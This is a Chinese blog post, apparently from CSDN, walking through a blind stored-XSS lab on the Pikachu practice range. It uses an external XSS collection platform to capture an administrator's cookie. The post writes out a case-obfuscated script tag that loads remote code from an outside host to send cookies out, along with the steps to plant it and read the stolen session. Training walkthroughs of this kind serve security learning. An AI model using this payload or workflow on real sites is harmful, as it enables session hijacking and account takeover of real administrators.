XSS平台获取管理员cookie

已于 2024-07-24 09:07:21 修改
阅读量53 收藏
点赞数 1
文章标签: xss 前端
于 2024-07-23 18:01:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cheapkiller/article/details/140642663
版权

首先需要打开xss平台进行注册https://xssaq.com/

然后同时打开pikachu靶场漏洞练习http://127.0.0.1/pikachu-master

1.创建新的项目

2.查看我的项目然后点击查看配置代码

3.复制<sCRiPt sRC=//d00.cc/KOi></sCrIpT>

4.打开pikachuxss盲打并将我们刚才复制的script恶意代码输⼊进去

5.模拟管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码

6.返回xss平台查看cookie

7.查看被劫持到的cookie信息

cheapkiller
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss Cookie
10-09
2. **伪造Cookie**:攻击者可以设置新的Cookie,使用户在不知情的情况下携带攻击者设定的状态信息,如假冒管理员权限。 3. **CSRF令牌盗用**:某些网站使用CSRF(Cross-site Request Forgery)令牌防止非预期的操作...
[BBP系列二] Uber XSS via Cookie 1
08-03
在2017年8月30日,一位安全研究员分享了他在Uber的一个XSS(跨站脚本)漏洞报告的细节,该漏洞允许攻击者通过Cookie注入任意JavaScript代码。这篇技术文章主要介绍了如何利用JSONP请求中的一个漏洞来实现XSS攻击。 ...
Web应用安全:XSS盗取cookiepayload(实验习题).docx
06-17
1. 攻击者将可以获取并发送管理员Cookie 的恶意 XSS 脚本到管理员访问的网站。 2. 当管理员访问网站的时候,恶意的 XSS 脚本将会被运行。 3. 攻击者就可以接收到管理员发送的 Cookie。 防御 XSS 攻击 为了防御 ...
xss漏洞jar.rar
09-29
或者当访问者浏览网页时恶意代码会被执行或者通过给管理员发信息的方式诱使管理员浏览,从而获得管理员权限,控制整个网站 攻击者利用跨站请求伪造能够轻松地强迫用户的浏览器发出非故意的HTTP请求,如诈骗性的电汇...
Web应用安全:XSS盗取cookiepayload.pptx
06-18
4. 管理员Cookie被成功获取,攻击者可以通过Postman等工具设置这个Cookie值,尝试模拟管理员身份登录网站。 **Cookie的后利用** 一旦攻击者获得了受害者的Cookie,他们可以利用这个Cookie进行各种恶意行为,如: ...
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 310
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
CSRF+XSS组合攻击实战
记录学习
07-19 1341
xss和csrf组合攻击漏洞复现
DVWA靶场超(详细教程)--跨站攻击(XSS+CSRF)
weixin_60838266的博客
07-19 1126
webanquan”去掉了(替换为空),我们的输入从alert变成了alert()
Vue使用FullCalendar实现日历/周历/月历
_小郑有点困了的博客
07-23 176
需求背景:项目上遇到新需求,要求实现工单以日/周/月历形式展示。而且要求不同工单根据状态显示不同颜色,一个工单内部,需要以不同颜色显示三个阶段。
谷粒商城实战笔记-39-前端基础-Vue-指令-v-on、v-for、v-if
epitomizelu的专栏
07-20 965
v-on 是 Vue.js 中的一个指令,用于在 DOM 元素上监听用户事件,并在事件触发时执行相应的 JavaScript 函数。它提供了一种将 Vue 实例中的方法与 DOM 事件关联起来的方式,使得你可以轻松地对用户交互做出响应。v-on 指令的基本语法是在元素上添加 v-on:event-name=“method”,其中 event-name 是你要监听的 DOM 事件类型(如 click、mouseover、keydown 等),method 则是 Vue 实例中定义的方法名。
VUE 子组件可以直接改变父组件的数据吗
Cshaosun的博客
07-23 104
如果子组件需要修改父组件的数据,‌应该通过触发一个自定义事件来通知父组件进行数据的变更。‌父组件在接收到子组件触发的事件后,‌可以修改数据,‌从而间接地改变父组件的数据。‌这种方式通过明确的事件通信机制,‌保证了数据流的单向性和组件之间的解耦。需要注意的是,‌虽然Vue提供了一些特殊的方法来实现子组件修改父组件数据,‌但这种方式打破了数据流的单向性,‌增加了组件之间的耦合性,‌因此应谨慎使用。在Vue中,‌如果确实需要在子组件中修改父组件的数据,‌可以通过以下步骤实现:‌。
Odoo Registry 源码解读:前端世界的魔法师
清水欧度 Odoo ERP
07-23 755
它是连接不同模块的桥梁,是实现灵活扩展的关键,是每个Odoo开发魔法师最强大的盟友。下次当你在编写Odoo模块时,请记住,你手中握着的不仅仅是键盘,而是Registry赋予你的魔法杖。想象一下,它就是Odoo世界里的预言球,所有的秘密都逃不过它的法眼。Registry会用它的魔法排序棒,确保每个生物都按照正确的顺序出场,场面蔚为壮观。Registry会把常用的魔法结果记在它的魔法笔记本里,下次再用时就不用重新计算了,节省了大量的魔法能量。Registry设置了强大的防御魔法,确保没有人能破坏它的魔法秩序。
【CTFWP】ctfshow-web42
LongL_GuYu的博客
07-23 622
CTFWP,ctfshow-web42
前端性能优化--懒加载
weixin_43799793的博客
07-19 197
3、同时还可结合 lazy loading 属性,利用浏览器的原生属性,进一步优化图片加载,不过其延迟加载机制完全是由浏览器自身决定的,在不同浏览器上效果不同(BTW,部分浏览器可能并不支持)。2、然后对元素进行监听,当图片进入可视区域时,提取元素的 data-src 即真实的图片地址赋值给 src 属性,就会去发送请求加载图片,实现了懒加载。设置为 1 张 1px*1px 的透明图片用作占位符,以防止出现出错图标。TinyPNG 网站: https://tinypng.com/
基于 Gunicorn、Flask 和 Docker 的 Web 应用开发
2401_85639015的博客
07-19 1536
Docker 是一个开源的应用容器引擎,它允许开发者打包他们的应用以及应用的运行环境到一个可移植的容器中。容器可以运行在任何支持 Docker 的机器上,确保了环境的一致性。通过本教程,你将学会如何使用 Docker、Gunicorn 和 Flask 构建一个高效、可扩展的 Web 应用。每个步骤都提供了详细的指导和示例代码,确保你能够理解和实践每个环节。希望本教程能够作为你进入微服务架构领域的起点。
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 433
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
Web Pages 表单
07-20 310
Web pages 表单是现代网页设计中不可或缺的组成部分,它们允许用户与网站进行交互,提交信息,如注册、登录、反馈、预订等。表单的设计和功能对用户体验和网站的业务目标有着直接的影响。本文将深入探讨Web pages表单的各个方面,包括设计原则、常用元素、验证机制和最佳实践。
vue如何解决跨域?
FENGZXCjjjjj的博客
07-21 478
在Vue.js项目中,当你的前端应用尝试从与自身不同源的服务器(协议、域名、端口中的任一不同)加载资源时,可能会遇到跨域(CORS, Cross-Origin Resource Sharing)问题。
Vue事件总线(EventBus)的概念、使用以及注意事项
最新发布
weixin_53216033的博客
07-23 486
在Vue开发中,组件间的通信是不可避免的需求。对于父子组件间的通信,Vue提供了props和$emit/$on等内置机制。然而,当需要在非父子关系的组件间进行通信时,这些内置机制就显得力不从心了。这时,Vue事件总线(EventBus)作为一种灵活的解决方案应运而生啦。本篇文章将详细讲解Vue事件总线的原理、安装、使用及最佳实践,帮助大家更好地去理解和应用这一技术。
xss怎么获取目标cookie
08-02
在存储型XSS击中,攻击者将恶意脚本存储在目标网站的数据库中,当其他用户或管理员访问包含该恶意脚本的页面时,脚本会被执行,从而导致用户的cookie信息被窃取。 根据引用[1]提供的信息,攻击者可以在目标网站的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值